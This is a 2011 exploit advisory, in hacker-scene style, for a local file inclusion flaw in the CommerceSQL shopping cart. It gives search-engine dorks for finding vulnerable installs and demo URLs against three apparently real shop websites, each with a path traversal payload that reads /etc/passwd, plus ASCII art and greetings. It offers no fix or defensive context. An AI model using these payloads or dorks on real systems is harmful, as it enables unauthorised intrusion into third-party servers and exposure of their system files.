# Exploit Title: CommerceSQL LFI Vulnerability .
# Author: xConsoLe`
# Home: http://dztools.net
# Vendor or Software Link: http://www.commercesql.com/
# Category:: Local File Include
# d0rk: intext:Couldn't exec sth! at ./admin/html_lib.pl line
# d0rk: inurl:cgi-bin/commercesql
# Tested on: Windows XP SP3
( ) /\ _ (
\ | ( \ ( \.( ) _____
\ \ \ ` ` ) \ ( ___ / _ \
(_` \+ . x ( .\ \/ \____-----------/ (o) \_
- .- \+ ; ( O \____
xConsoLe Powa ) \_____________ ` \ /
(__ +- .( -'.- <. - _ VVVVVVV VV V\ \/
(_____ ._._: <_ - <- _ (-- _AAAAAAA__A_/ |
. /./.+- . .- / +-- - . \______________//_ \_______
(__ ' /x / x _/ ( \___' \ /
, x / ( ' . / . / | \ /
/ / _/ / + / \/
' (__/ / \
> Demo:
eg: http://birdstheword.com/cgi-bin/eStore/index.cgi?cart_id=2263.81894&pid=396
>> http://birdstheword.com/cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd
eg: http://www.garagedoorcheck.com/cgi-bin/CommerceSQL/index.cgi?page=95
>> http://www.garagedoorcheck.com/cgi-bin/CommerceSQL/index.cgi?page=../../../../../../../etc/passwd
eg: http://brewercoinc.com/cgi-bin/eStore/index.cgi?did=2&plid=&pid=27&product=
>> http://brewercoinc.com/cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd
Greetz: My Girl <3 ; Uknownv1rus ; Dfpirate ; J|nX ; Massyusse ; Death.Sev ; XeN` ; FiiskeR ; Manson .
Made in Algeria .
Shab El Bac 2011 nchallah : Ma , Am , Li , Sa , Sa , Ha , Mehdi K , Rafa , Bou3am ,
MahM0ud , Death.Sev & All Djma3et Elkhire :D .
PEACE ^^ .
#
